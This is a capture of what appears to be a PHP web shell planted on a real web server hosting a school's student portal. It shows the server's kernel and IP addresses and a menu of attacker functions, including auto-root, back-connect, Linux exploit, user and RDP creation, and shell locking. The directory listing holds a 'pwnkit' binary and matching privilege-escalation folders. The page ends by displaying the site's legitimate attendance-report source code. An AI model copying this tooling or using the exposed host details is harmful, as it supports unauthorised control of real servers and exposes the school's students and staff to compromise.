Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
ems /
studentsportal /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admit
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
datespicker
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
menu
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
textEdit
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AjaxDailyAttendanceSheet.php
3.03
KB
-rw-r--r--
AnsPaper.php
10.02
KB
-rw-r--r--
DueandPaidReport.php
4.56
KB
-rw-r--r--
QuestionPaper.php
16.07
KB
-rw-r--r--
RegistrationForm.php
44.94
KB
-rw-r--r--
admit.css
2.66
KB
-rw-r--r--
admit.php
7.78
KB
-rw-r--r--
ajaxAddAns.php
815
B
-rw-r--r--
ajaxDateWiseReport.php
18.07
KB
-rw-r--r--
attendanceReport.php
5.81
KB
-rw-r--r--
changePassword.php
3.93
KB
-rw-r--r--
check_grou_name.php
1.15
KB
-rw-r--r--
cheking_period.php
3.02
KB
-rw-r--r--
dailyAttendanceSheet.php
6.58
KB
-rw-r--r--
dashboard.php
8.84
KB
-rw-r--r--
dueReport.php
8.75
KB
-rw-r--r--
error_log
3.81
KB
-rw-r--r--
index.php
6.88
KB
-rw-r--r--
login.php
4.73
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
result.php
8.25
KB
-rw-r--r--
singleStdAttendanceReport.php
5.71
KB
-rw-r--r--
student_info.php
22.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dailyAttendanceSheet.php
<?php require_once("../db_connect/config.php"); require_once("../db_connect/conect.php"); date_default_timezone_set("Asia/Dhaka"); $db = new database(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Student Attendance Report</title> <script type="text/javascript" src="../js/vendor/jquery-1.11.3.min.js"></script> <link href="../css/bootstrap.min.css" rel="stylesheet"></head> <script src="textEdit/redactor/redactor.min.js"></script> <link rel="stylesheet" href="datespicker/datepicker.css"> <link rel="stylesheet" href="datespicker/bootstrap.min.css"> <script src="datespicker/bootstrap-datepicker.js"></script> <script> $(document).ready(function () { $('#example1').datepicker({ format: "yyyy-mm-dd" }); }); $(document).ready(function () { $('#example2').datepicker({ format: "yyyy-mm-dd" }); }); function showData(){ var showdata="dddd"; $.ajax({ url:"AjaxDailyAttendanceSheet.php", type:"POST", data:$(".addATeent").serialize() + "&showdata=" + showdata, success:function(text) { //alert(text); $("#showData").html(text); } }); } function check_availability() { var class_name = $('#selectClass').val(); var dailyAttendanceSheet = "dailyAttendanceSheet"; $.post("check_grou_name.php", { class_name: class_name,dailyAttendanceSheet:dailyAttendanceSheet }, function(result){ //if the result is 1 if(result) { //show that the username is available $('#selectGroup').html(result); } else { //show that the username is NOT available $('#category_result').html('No Group Name Found'); $('#selectGroup').html(''); } }); } function check_period() { var class_name = $('#selectClass').val(); var periodshow = "periodshow"; $.post("cheking_period.php", { className: class_name,periodshow: periodshow}, function(result){ //if the result is 1 if(result != 0 ) { //show that the username is available $('#Period').html(result); $('#chek_type').html(""); } else { $('#Period').html(""); } }); } function check_subject_section() { var class_name = $('#selectClass').val(); var group_name = $('#selectGroup').val(); var SearchSection = "SearchSection"; $.post("cheking_period.php", { className: class_name, groupName: group_name, SearchSection:SearchSection}, function(result){ //if the result is 1 if(result != 0 ) { //show that the username is available $('#section').html(result); } else { $('#section').html(""); } }); } </script> <style> @media print{ #submit{ display:none; } @page { size: auto; /* auto is the initial value */ margin: 0mm; /* this affects the margin in the printer settings */ } html { background-color: #FFFFFF; margin: 0px; /* this affects the margin on the html before sending to printer */ } body { border: solid 0px blue ; margin: 10mm 15mm 10mm 15mm; /* margin you want for the content */ } } </style> <body> <form name="teacherinfo" action="" method="post" enctype="multipart/form-data" id="newFrom" class="form-horizontal addATeent" > <div class="col-lg-12 col-md-12"> <table width="1075" id="notprint" class="table table-bordered table-responsive" style="margin-top:10px; margin-bottom:0px"> <tr> <td colspan="6" align="center"> <span class="text-success" style="font-size:18px;"><strong>Date Wise Students Attendance Report</strong></span></td> </tr> <tr> <td>Select Class</td> <td> <select class="selectClass" id="selectClass" name="selectClass" onchange="return check_period(),check_availability()" style="width:250px; height:30px; padding-left:5px;"> <option value="Select Class">Select Class</option> <?php $selectClass="SELECT * FROM `add_class`"; $resulClass=$db->select_query($selectClass); if($resulClass){ while($fetch_class=$resulClass->fetch_array()){ ?> <option value="<?php echo $fetch_class["id"]?>"><?php echo $fetch_class["class_name"]?></option> <?php } }?> </select> </td> <td>Group</td> <td> <select class="selectGroup" id="selectGroup" name="selectGroup" onchange="return check_subject_section()" style="width:250px; height:30px; padding-left:5px;"> </select> </td> <td>Section</td> <td> <select class="section" id="section" name="section" style="width:250px; height:30px; padding-left:5px;"> </select> </td> </tr> <tr> <td>Select Period</td> <td><select class="Period" id="Period" name="Period" style="width:250px; padding-left:5px; height:30px;" > </select></td> <td>From Date</td> <td> <input type="text" name="example1" id="example1" autocomplete="off" autocomplete="off" style="width:250px; padding-left:5px; height:30px;"/></td> <td>To Date</td> <td> <input type="text" name="example2" id="example2" autocomplete="off" autocomplete="off" style="width:250px; padding-left:5px; height:30px;"/></td> </tr> <tr> <td colspan="6" align="center"> <input type="button" name="submit" id="submit" value="Submit" onClick="return showData()" class="btn btn-success"/> </td> </tr> </table> </div> <div class="col-lg-12 col-md-12 " id="showData"></div> </form> <script src="../js/bootstrap.min.js"></script> </body> </html>
Close